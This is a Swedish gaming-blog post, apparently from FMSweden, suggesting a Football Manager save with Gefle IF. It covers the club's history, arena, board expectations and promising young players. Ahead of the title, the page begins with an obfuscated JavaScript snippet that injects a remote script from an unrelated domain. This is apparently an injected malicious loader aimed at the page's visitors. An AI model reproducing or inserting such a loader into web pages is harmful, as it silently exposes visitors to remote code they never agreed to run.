;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Gefle IF – FMSweden
Meny Stäng

Veckans inspiration: Gefle IF

Denna vecka ligger fokuset på den inhemska fotbollen, närmare bestämt Gefle Idrottsförening. Fotbollssektionen grundades 1896 och klubben ligger på en tjugofjärde plats i den allsvenska maratontabellen efter att ha tillbringat sexton säsonger i högstaligan. Åren 2005-2016 lyckades de etablera sig i finrummet trots ytterst begränsade resurser, mycket tack vare tränaren Pelle Olsson. Då innehöll truppen spelare som Mattias Hugosson, Jonas Lantto och Johan Oremo. 2018 åkte de ur Superettan och har nu två mindre lyckade säsonger i division 1 bakom sig. Utmaningen för en save med Gefle blir således att först ta steget upp till Superettan och sedan lyckas återupprepa Olssons bedrift och etablera klubben i högstaserien igen. Det har ju gått en gång, så varför inte igen?

Faciliteterna ser lovande ut, med en ny och fräsch arena i form av Gavlevallen i spetsen. Med en kapacitet för 6400 åskådare sticker den onekligen ut i division 1-sammanhang. Kruxet är dock att GIF likt i princip alla andra klubbar i division 1 bara är halvprofessionella, vilket försvårare kontraktsskrivandet en del. Den första säsongen är laget tippade någonstans i mittenskiktet, med BP som favoriter till seriesegern. Med lite tur går det nog att utmana om kvalplatsen redan första säsongen. Styrelsen begär endast en plats på övre halvan och har inga andra krav mer än att jobba inom lönebudgeten, vilket troligtvis innebär en relativt lugn start. Truppen har en väldigt låg medelålder med endast två spelare över 25 år, där bägge förvisso är nyckelspelare. Talangmässigt finns det en trio som sticker ut: vänsterbacken Lohikangas, innermittfältaren Sandlund och anfallaren Lidberg. Således finns det mycket potential som förhoppningsvis även kan resultera i fina försäljningar. Lycka till med saven om du testar på Gefle IF!

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar